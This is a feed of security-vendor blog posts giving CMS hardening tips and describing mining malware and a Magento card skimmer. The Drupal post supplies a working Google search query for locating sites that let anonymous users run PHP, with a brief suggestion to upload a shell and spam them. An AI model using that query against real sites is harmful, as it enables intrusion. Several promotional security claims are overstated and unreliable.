Peter C – Security Blog https://blog.siteguarding.com Thu, 12 Dec 2019 08:08:55 +0000 en-US hourly 1 https://wordpress.org/?v=6.5 https://blog.siteguarding.com/wp-content/uploads/2016/07/cropped-Logo_sh_last_2_last-32x32.jpg Peter C – Security Blog https://blog.siteguarding.com 32 32 Mining Malware Detection and Removal Tips https://www.siteguarding.com/security-blog/mining-malware/ Tue, 20 Feb 2018 15:49:59 +0000 https://blog.siteguarding.com/?p=503 Read More]]> The hidden mining for cryptocurrency is not a new topic, although there are almost no worthy technical instructions for its detection and elimination. There is only a lot of scattered information and articles of doubtful content. Why? Because everyone benefits from mining world-wide cryptography, except, of course, the one who does not get a penny from this and does not even suspect that he has become a part of the global computer network.

How does it work? It’s simple – without the knowledge of the user, for example, when you open any file, the malware mining script is installed, which is connected to one of the mining pools and begins to produce cryptocurrency. Mining pools often choose the most appropriate option for a specific hardware configuration by themselves among them there are: coinhive mining script, monero mining script, Java Script miner.

Payments are made to the information in the “employer” account details, and he has the right to connect to his account any number of PCs, and no one requires him the evidence that they belong to him or their owners have approved this action.

That’s why pools are an ideal option for creating your own mining network (botnet). And they are doing it now (or trying to) all of whom are not lazy – from pros to schoolchildren, regulars of all sorts of “dark forums” with plums of “trouble-free and tested” schemes.

How to detect and remove

If you notice when you visiting any site that your computer has started to make noise and get warm, then most likely there is a hidden mining on this site. Look at the CPU usage statistics, when the processor is mined the processor will be heavily loaded. Then you need to scan the entire system for viruses and malware. However, these measures, which you can undertake by your own, are extremely superficial.

An integrated approach to solve the problem is needed. SiteGuarding.com company solves this problem quickly and effectively.

]]>
Magento vs WordPress: which is the most secure? https://www.siteguarding.com/security-blog/magento-vs-wordpress-which-is-the-most-secure/ Thu, 18 Jan 2018 12:29:33 +0000 https://blog.siteguarding.com/?p=498 Read More]]> Magento is still the most popular ecommerce platform. It’s known as the most trusted platform with a high functionality and customizability level. WordPress is considered the fastest growing CMS currently. Initially, it’s referred to blogs because its main functionality is aimed at easy blog keeping. By the way, its developers have succeeded in turning it into the perfectly well content management system.

Magento or WordPress? This is a question which like many similar ones have no right answer. It depends on which goals you would like to achieve.

If your primary aim is to sell products via online stores, it will be definitely better for you to choose Magento platform. The truth is this Magento 2 Cloud CMS is specially created for trading through the Internet. By the way, if you are not interested in ecommerce and just would like to create and post some amazing contents, WordPress is what you actually need.

WordPress is traditionally famous for its plugins. Besides its own extensions, WordPress is ready to offer multiple third-party plugins. But there is one sad fact. The security of such third parties products is up in the air. And this is the main point you should take into consideration when choosing WordPress for ecommerce.

At the same time, Magento doesn’t need any additional plugins itself. It has the native functionality which is enough for creating secure stores. But as a rule, the owners of major business always try to empower their stores and install different extensions with useful features. By the way, all the Magento plugins meet the highest security requirements.

Security is actually what vendors are worrying about primarily. The first reason is their customers make online payments and they should be ensured their classified information under strong protection. So, what makes Magento the most secure platform for ecommerce?

  • Security patches and timely notification

As Magento security center informs in 2015 they released 7 security patches and two more in 2016. All those who joined to their security alert registry are immediately informed about security updates. So that, vendors are always aware of what else they can do for providing the highest protection of their stores.

  • Free tool for scanning

If you miss some security news or just with a view to prevention you always can scan your Magento website for free. There is a special tool for scanning and detecting vulnerabilities for you to be sure your website is under protection.

  • Availability of multiple security plugins

There is a great number of Magento security extensions. They can estimate limits or block threats, scan vulnerabilities, empower passwords, scan changed files. Some of them can be downloaded from Magento Connect or reliable 3rd party websites.

By the way, you need to be carefully attentive with the Magento 2 extensions and Magento themes. Those of them which are pulled down from the Magento Marketplace/Connect are subject to cyber attack mostly. And it’s also needed to remember about updations and always use updated versions of Magento plugins and Magento templates.

Choosing the perfect option for your business to organize please pay attention to the following fact. Despite WordPress is easy to use, simple to customize and flexible enough, Magento is a key player in the market of ecommerce platforms. The reason is not only its extended functionality which allows creating a store from scratch, the main its advantage is a high level of security.  When it comes to WordPress based websites, they are the most vulnerable for being attacked. There is no reliable protection system compared to Magento which always faces to the payments and personal data storage.

]]>
10+1 Tips How to Improve the Security of Your Magento 2 Store https://www.siteguarding.com/security-blog/101-tips-how-to-improve-the-security-of-your-magento-2-store/ Tue, 31 Oct 2017 05:48:11 +0000 https://blog.siteguarding.com/?p=492 Read More]]> Security is the issue that should never be ignored by online merchants. And Magento 2 stores are not the exception to this rule. In this article, we will give you some useful tips how the security of your Magento 2 store can be improved. So, let’s start.

Update Your Magento 2 to the Latest Version

The Magento team regularly releases updates of its platform by adding new features and improving the old ones, in particular, the security issues. So, check for the latest updates from time to time to provide your web store with the latest protection solutions.

Use Reliable Magento 2 Extensions

The reason why Magento 2 extensions are so popular is that they allow enhancing the basic functionality of this platform. However, before installing any extension, make sure that this extension is provided by a truly reliable developer, not some defrauder. In addition, it’s recommended to download Magento 2 extensions from trustworthy resources, such as the Magento Marketplace site.

Create Encrypted Connection

If the data are transferred through an unencrypted connection, there is the risk that this data can be intercepted. However, this problem can be prevented by configuring secure URLs right in your Magento 2 Admin Panel.

To perform the configuration, go to Stores-Configuration. In the Configuration menu, expand the Web option. In the panel opened, find the Base URL (Secure) section and expand it. Here, you can configure the URLs to establish the encrypted connection.

Use Two-factor Authentication

As a rule, a secure Magento 2 password is not the guarantee of complete website protection from hacker attacks. Consider using two-factor authentication to further improve the security of your Magento 2 store and protect yourself from password-related risks that may appear in the future.

Create Backup Files

Make sure that you have a backup version of all your web store files in case your store is hacked. The possibilities of Magento 2 Cloud Solution allow you to backup the entire database of your site, including the system and media files.

To perform the backup, in your Magento 2 Admin Panel, click on System and choose Backups in the Tools section. In the panel opened, you can manage the backup process of your files. After the configuration is completed, apply changes by clicking on the Save Config button.

Take Care of Your Email Address

Magento 2 automatically configures e-mail addresses through which users can easily recover their passwords. Still, if your email ID was hacked, your Magento 2 store becomes subjected to hacker attacks. So, make sure that the email address given by Magento is not publicly known (change it if needed) and protected with the two-factor authentication.

Limit Admin Access

To ensure that the Admin Panel of your store can be accessed from a particular IP address, just restrict the admin access in your Magento 2 settings. First, click System in your Magento 2 Admin Panel and choose User Roles in the Permissions section. In the panel opened, you can manage user roles in your store by clicking on the Add New Role button and ascribing the corresponding roles for particular user IDs.

Enable Admin Login CAPTCHA

CAPTCHA is the technology that prevents hackers and even bots from accessing the database of your site. You can enable this technology in your Magento 2 Admin Panel.

First, click on Stores in the Admin Panel and choose Configuration in the Settings section. In the Configuration menu opened, expand the Advanced section and choose Admin. On the page opened, expand the CAPTCHA section. Here, you can enable the CAPTCHA feature for your web store and configure its settings. Don’t forget to save the configured settings by clicking on the Save Config button.

Configure Action Log

If you use Magento 2 Commerce Edition, you can track the store admin activity through the Action Log feature. To enable the feature, in your Magento 2 Admin Panel, open Stores and choose Configuration in the Settings section. In the menu opened, expand the Advanced tab and choose Admin.

In the window opened, expand the Admin Actions Logging section. Here, you can configure the Action Log settings. When the configuration is completed, save changes.

Use Security Review Services

Magento security experts can give you useful recommendations on how to increase the protection of your store. Still, their tips do not always help to solve all the issues that you are dealing with. That’s why it’s recommended to use special services for analyzing web sites for potential security breaches at least once a year. By performing such checks, you can decide how the security of your store can be further improved.

Bonus Tip

The Magento 2 community, which always ready to help you with any security issues you face, grows constantly. What’s more important is that community members regularly release security reports related to the latest versions of Magento 2. So, visit Magento Forums to provide yourself with the latest Magento 2 security information!

Conclusion

The protection of a web store from hacker attacks should be the number one priority for Magento 2 store owners. Use the tips given in the article to enforce your site’s protection and leave no chance for hackers that may try to breach your security.

]]>
6 Tips How To Improve Magento Security https://www.siteguarding.com/security-blog/6-tips-how-to-improve-magento-security/ Sat, 07 Oct 2017 21:34:51 +0000 https://blog.siteguarding.com/?p=488 Read More]]> While working with a Magento-based website you will be surprised by the number of built-in security features. But safety is a vital point and additional measures to make your website safer are at the stake. Let’s check what I suggest:

  1. Try to be ahead of Magento security updates. Magento developers are working off their socks to provide merchants with more powerful safety system. They try to consider all possible risks and prevent they happen. As a result new Magento versions are stuffed with features and software to snatch detected security risks.
  2. Don’t be rash! Try to avoid simple passwords included your data birth and others the same. Use random letter and figure combinations and change it regularly from time-to-time. And don’t use the same or a little bit similar passwords for your multiple accounts. This is the best thing that prevents you despite what CMS you apply to each your account doesn’t refer to your store.
  3. If you are happy owner of large business, you need more people engaged into store operation. It considerably increases the risk to be broken. It’s a mistake to provide an access to all administrative staff. It’s more reasonable they use different user accounts.
  4. In the ocean of Magento extensions development companies, try to choose exceptionally checked extensions developers. It’s good to test something new. In general an experiment is the best way to select the most suitable things. But remember that when security is at a stake it’s better to pass by any experiments and choose well-tried products.
  5. You know that bugs (equipment failure, staff mistakes, force majors and etc.) are killing business. In this light you always should have your data backup. The perfect thing when you make more than single backup and regularly take your website data backups. It will play directly into your website restore in case of security break.
  6. Let two-factor authentication become a habit. The random password is good but it doesn’t guarantee experienced hackers detect a well-made password ever. Sending a login code to a mobile device is good and prevalent practice. It provides your store are protected from unauthorized login case.

What other measures may be taken to keep a website protected? I’m looking forward to your personal recommendations! See you soon!

]]>
Why Magento Security is Important https://www.siteguarding.com/security-blog/why-magento-security-is-important/ Wed, 26 Jul 2017 11:13:54 +0000 https://blog.siteguarding.com/?p=455 Read More]]> Content management system Magento was developed in the US in 2007 by the well-known company Varien. The site management system Magento was developed in the US in 2007 by the well-known company Varien. Free CMS Magento is open-source software, developed on the basis ZendFramework and operates on a UNIX operating system. CMS is primarily suitable for developing large online stores. On this platform, there are already over 100,000 online resources in the network all over the world.

Opportunities and features of Magento

Based on a single Magento platform, you can instantly create several Internet resources and manage them at a time, which is very convenient for administration. The catalog system is well structured, there is the possibility of comparing the goods. Free management of prices for goods, stock additions and gift certificates makes working with the system convenient both for the site administrator and for the buyer, who can choose goods at a discount and sort it according to certain characteristics.

Additionally, Magento offers good opportunities for search engine optimization: access to the html code management; possibility for each product or category to add meta tags description and keywords; for each product you can add the right end in the site address, as well as Magento itself makes XML sitemap to the search engines. Magento provides a multicurrency and currency conversion system. This will become a convenient function for customers, regardless of the country in which they are located.

If you want to run your online store on Magento without using templates, you will need knowledge of HTML markup and CSS styles. However, to work with this CMS, it is best to hire a specialist in this field.

In addition to the platform, free and paid modules are provided that expand the functions of the CMS. All free of charge are recommended to be checked on the test form from the beginning, as many low-quality ones come across. For paid modules free technical support from developers is offered.

So, Magento CMS – a solid and high-quality platform, which is great for creating an online store. In some ways, it can be difficult for an inexperienced user, but its capabilities are much wider than other similar platforms. And if there are no functions in the basic configuration, then you can connect additional modules – at the moment there are more than four thousand different extensions.

Magento Security

The most popular recent version of using a hacked site on Magento is the installation of a spy script that tracks forms and sends the values that they enter to the hacker. So the hacker gets access to the data of bank cards from which customers pay for purchases in the store, as well as personal data of the cardholder. That is, all those values that the buyer enters at the stage of registration of the order.

The script is loaded on any page of the store, but it is active only where sensitive data is entered. Usually, these pages contain in the address fragments “onepage”, “checkout”, “onestep” – ordering pages.
The script extracts data from the fields of the form input, select, textarea, checkbox, forms a message from them and sends them to the attacker’s site through ajax.

To ensure Magento security, it is necessary to install the security patches issued by the manufacturer in a timely manner.

]]>
How to Harden Joomla Security https://www.siteguarding.com/security-blog/how-to-harden-joomla-security/ Wed, 26 Jul 2017 09:42:18 +0000 https://blog.siteguarding.com/?p=444 Read More]]> The virus is a software product and it does not get to the site by air. The virus is brought to the site after the hacking or the owner (administrator) of the site enters a virus with extensions and system templates. Lets consider the 6 main points of “entry” of viruses on the site.

1. Hacking server hosting provider

Any service hosting provider is, in fact, a large computer that is also exposed to attacks and infections. Unfortunately, if your sites are located on a service that has been or is being attacked, you can react to this situation only sequentially, that is, to eliminate the consequences of hacking or attacking.

Protection against hacking of the hosting provider’s service can only be preventative.

Choosing a hosting provider, choose only trusted and top-end services. Note whether the hosting provider is using its data center or rents it. In a reviews of the hosting provider pay attention to the statistics of its downtime and unavailability of sites.

The “defenders” of sites have the first “golden” rule: for each domain (site), you need to create a separate user account. It practically doesn’t work out for Shared Hosting (hosting, where under the same account, you are allowed to create 2-20 sites), but it is quite feasible on VDS-servers. Such separation of sites by accounts, isolates sites from each other and when one site is infected, excludes a similar infection of other sites of the account.

2. Hacking the site through “holes”, the vulnerability of CMS

Any content management system (CMS) eventually becomes vulnerable. Not an exception and CMS Joomla. That is why it’s important for Joomla Security to monitor the system updates and periodically update it with new security releases.

3. Hacking CMS Joomla

Methods hacking CMS are as follows:

– Hacking Web site and download shells and backdoors through various forms of downloads: photos, media files, and other files;
– Introduction of malicious code through spam mailing or through SQL injection;
– Theft of site administrator data (SQL injections, XSS attacks, bruteforce);
– Website infection through third-party extensions and templates;
– Downloading extensions and templates from blogs and Webmasters’ sites, even the most famous ones, is the direct way to possible infection of the site. Sometimes, such a chain-loading extension, from user to user, leads to massive infection;
– Not recommended and all kinds of “torrent” trackers, offering a free download of a paid extension or template.

4. Hacking the Joomla site with a brute force attack

Bruteforce attack is the selection of the name and password of the site administrator. This loophole is closed by complex administrator passwords and changing the administrator’s name from the “admin” to another one.

5. Website hijacking FTP interception

Working with the site impossible to manage without access to an FTP site directory. FTP protocol is quite accessible and it would be strange if the attackers did not try to use this loophole. To protect yourself from this loophole, you need to use the SFTP protocol, create a separate FTP account for each site and not to store passwords in the FTP client.

6. Unprofessionalism of hired freelancers

If you do not deal with the site by yourself and hire freelancers to change design or other work, it is possible a virus code infection.

]]>
How to harden WP security https://www.siteguarding.com/security-blog/how-to-harden-wp-security/ Wed, 26 Jul 2017 09:36:48 +0000 https://blog.siteguarding.com/?p=439 Read More]]> Many have seen reports that another site was hacked. Perhaps someone personally came across this. How can a site be hacked, and what protection measures can be taken? We will talk about what needs to be done to protect your site and not become a victim of hackers.

Hacking a site is getting unauthorized access to the site files or to the administration panel of the site management system.

In this article, we will not consider hacking hosting on which the site works, and will focus only on hacking the site itself.

First of all, note that if you do not do anything, then sooner or later the site will be hacked!

The fact is that modern sites on WordPress have about 500 thousand lines of code. Also this code is for the most part open and anyone can analyze it, including the vulnerability. In such a huge array, sooner or later they will find an error, and the attackers will want to use it.

A site on a sample platform, such as WordPress, can be recognized by its signature features. Having crawled your site on a set of signatures, you can find out a lot of details: the name and version of a typical platform, what plugins and extensions are installed and their versions, the list of users, and so on.

There is a huge number of different online scanners that constantly scan the network in search of sites based on this platform. When your site is scanned by one of the scanners, this is a matter of the near future.

In order to make it difficult to scan your site, you can install plugins that will hide the version of WordPress.

It is extremely important for WordPress Security to make periodic updates. Updates not only cover the vulnerabilities found, but can also contain new improved functionality, improve the site’s performance. However, before updating, you should make a backup copy of the site in case there was an error in the update by the developers or something went wrong. It is also important to check the site after the next update.

A common way to hack a site is to get passwords to the administrative panel of the site. How do hackers get passwords? intercept the password that has been transmitted through unprotected HTTP protocol, pick the password by brute force, decrypt the password by accessing the site database.

The best way to protect against this type of attack is to use a secure HTTPS protocol instead of HTTP. To protect yourself from such an attack, you need the entire site or at least the administrative panel of your site to be accessible only through the secure HTTPS protocol. This requires an SSL certificate. Certified certificates cost money and have a finite period of validity.

Attack by brute force – is a very common method of attack on the network by WordPress sites. Of course, no one will pick up passwords manually. For the selection of passwords there are special programs.

To ensure security, you need to set a password for the wp-admin folder, rename the page address to enter the administrative menu, grab the input and the forgotten password page, disable the error message for the wrong password, prohibit the enumeration of all users.

Unfortunately, you will not be able to completely secure your site from hacking. The fact is that you need to close all possible loopholes, and the attacker must find only one single one. However, do not be discouraged. If you follow the security rules, then it will be extremely difficult and long to hack your site.

]]>
How to Secure OpenCart CMS https://www.siteguarding.com/security-blog/how-to-secure-opencart-cms/ Tue, 25 Jul 2017 11:13:25 +0000 https://blog.siteguarding.com/?p=433 Read More]]> OpenCart, like some other CMS, can be called a relatively secure platform. However, as with other content management systems, it is better to immediately take care of the security and protection of your site from hacking by unauthorized persons. In this article, we’ll give you basic tips that will help you to improve the OpenCart Security of your site. First of all, the article is suitable for those who have their own online stores made on the basis of OpenCart, but, on the other hand, the tips are quite universal, so they will be interesting to site owners on other CMS.

1. Hiding the login to the administrative panel

By default, in order to enter the admin panel, usually used the following: your_site/admin. Naturally, the more information the hackers have, the easier it will be for them to hack your site. Therefore, the first recommendation is to change the login address to the admin panel from /admin to another: /manager, /panel or something even more complicated.

How to do it: in the file manager or in phpMyAdmin, first, change the name of the folder “admin” to another; second, make the same replacement in the “config.php” file inside the folder that you renamed; thirdly, sometimes you need to make changes to the “config.php” file in the root folder (check if there is mention of “admin” there).

2. Change the administrator’s login and password

After changing the address to enter the panel it is worth to think about changing the login, which also by default looks like “admin”. It should be noted that this is generally the main login, which is usually used on many CMS, so even if you have a store or site not on OpenCart, I still advise you to immediately change it.

How to do it: go to the admin panel, select “System”, then “Users” and again “Users”. See the line in the login “admin” – go to the settings and change the login to another.

By the way, right there you can change the password – I strongly recommend that you do this by creating a password no shorter than ten characters. If you can not figure it out yourself, use one of the online services for generating passwords, which can be easily found in Google.

3. Change access rights for important files

Two files, namely config.php in the root folder and config.php in the folder that by default is called admin (whose name was changed above) contain important information associated with the database, so it is recommended to change the permissions for these files to “Reading Only”.

How to do it: you can change the rights with any tool that you use to work with files. The easiest way is to change them directly in the hosting control panel.

4. Failure to display errors

As a rule, hacking websites, hackers use different loopholes, and error messages that are displayed on the wrong actions are often very helpful for them. Therefore, I recommend you to refuse displaying these errors.

Here you, most likely, will have a question, but what if you need to look at the mistakes? To do this, you can use the error log file (its name is in the same block in the settings).

You can view it if you go to the root folder of the site, then in system and then in logs.

How to do it: go to the admin panel, point “System”, then “Settings” – and there in the settings open the “Server” tab, at the bottom there will be the “Errors” block, there you should put “No” in “Show errors”.

]]>
How to Protect osCommerce CMS from Hackers https://www.siteguarding.com/security-blog/how-to-protect-oscommerce-cms-from-hackers/ Tue, 25 Jul 2017 10:35:50 +0000 https://blog.siteguarding.com/?p=428 Read More]]> OsCommerce is one of the most popular content management systems for online stores. Its main advantages are a wide variety of modules and functionals that allow you to create a store of any complexity and any structure. However, it requires a certain professionalism.

OsCommerce is a free open source CMS that can be freely downloaded from the official portal of the system. There are also necessary modules and additions. Help and support can always be obtained in the community of osCommerce, thanks to the participants of which, by the way, there appeared a significant number of additional functionals of the system.

So today we will talk about the osCommerce Security of the online stores and safe behavior on the Internet.

Hacking online store is dangerous for both sides – the shop owner and customers. From the hacked store, attackers steal confidential information: customer contacts, bank card numbers and other valuable information. Hackers can completely break the store. As a result, the seller loses reputation, and buyers – anonymity.

There are a lot of ways to protect your online store from hacking. In this article we will talk about the most accessible.

1. Encrypt the connection

Connect an SSL certificate to the server of your online store to enable a secure connection between the buyer’s browser and the store. This connection is almost impossible to hack. Therefore, an SSL connection is a musthave for any site that processes customer’s personal data.

2. Timely updates

Hackers are constantly finding new vulnerabilities in programs: operating system, browser, CMS. You need to quickly close these holes in security by updates.

3. Two-step authorization

Two-stage authorization is one of the most reliable ways to protect from hacking, so this authorization is used by Internet banks.

After entering the login and password, you receive a message on the phone with an access code. Login to the site is possible only by entering this code in a special field on the authorization page. Even if the attacker receives your password, he can’t enter the site without your mobile phone.

4. Using Password Managers

For osCommerce security, you need to use complex passwords, unique to each resource. In order not to keep all passwords in the head or on a piece of paper under the keyboard, use the password manager. Password Manager will generate reliable passwords for you and store them. Access to passwords in the manager can be obtained only with the help of a master password. So just remember the master password.

5. Protect devices

All previous methods protect you against software hacking. But you can get a completely desperate attacker who will try to access your devices.

Imagine that an attacker has access to the computer from which you manage the site, and the browser is configured to auto-complete passwords. And now access is already in his hands.

To protect devices, set up encryption. The easiest way is to set the administrator password to log in to the computer and the lockscreen on the mobile device.

But it’s better to use advanced encryption. For different devices, different methods.

These methods – just the tip of the security. So start using them now if you are not already using it.

]]>
How to Hack Website on Drupal CMS https://www.siteguarding.com/security-blog/how-to-hack-website-on-drupal-cms/ Tue, 25 Jul 2017 10:23:28 +0000 https://blog.siteguarding.com/?p=417 Read More]]> drupal security

Drupal – one of the most famous and popular open CMS in PHP. CMS itself is built on the right approach and with an eye to safety guideline. CMS Drupal in its architecture is a very secure system, kernel and module security fixes come out quickly, and hacking it through holes is not so easy.

Drupal is reliable in itself. Only using unverified modules, programmer errors, creating their own modules for the site, also server configuration errors or non-compliance with the Drupal Security foundations can be the reason for the hacking.

By the way, very often the Drupal Security group issues security news with a critical level of vulnerability. Therefore, Drupal is safe for the time being, until a new version comes out, in which the removed vulnerability will be revealed to all hackers. Often sites on Drupal that are not updated immediately after the release of the security update are under attack by hackers.

As with other CMS, most of the vulnerabilities come out of various plugins, themes and other custom functions. It is most convenient to have a tool that shows the versions of Drupal and its components. Knowing them, you can search for known vulnerabilities.

Usually, vulnerabilities are detected by bots – programs that are written by hackers to search Internet sites on different CMS. Bots perform basic actions, for example, try to register or enter the admin 11111 password and other more complex actions. In case the site does have a vulnerability, the bot implements the program and sends information to the hacker database of broken sites, then the attacker can perform illegal actions if your site is profitable, for example, has a high attendance.

But now we will talk about the vulnerability of another kind, namely about the stupidity, oversights and disorder of those web developers, who gives an access to the input format “PHP Code” for anonymous and other users. And it allows you to run any php code without having access to the site admin area. In all instructions for Drupal Security write to be careful with the built-in module “PHP Code” andl not to permit access to it to strangers, and even less to unauthorized visitors. But, as we will see, these requirements are often neglected…

To search for vulnerable sites running on Drupal, will help us all-powerful Google. Its search operators allow you to find sites for many, very interesting parameters. We will look for indexed pages for editing materials, where one (or only) input filter is “PHP code”.

Search Algorithm:
1. The page URL must contain “node” and “edit”;
2. The page in the text should mention the phrase “You may post PHP code”.

The “inurl” operator, which allows us to find sites containing certain words in the URL, will help us in this, in our case this is “node” and “edit”.

A search for these criteria is performed by the line: inurl:node inurl:edit “You may post PHP code”

Next you will see a list of vulnerable sites running on Drupal. Obviously, many of them have already been used by spammers.

What to do with it to protect your Drupal website? Pour the shell, spam the site, scan the server.

How to protect yourself from this? Disable the “PHP Code” module. If this can not be done at all, then limit the rights to it to a minimum of people, preferably only to the chief administrator.

So don’t commit such nonsense, keep your kernel and modules up-to-date and your site will be safe!

]]>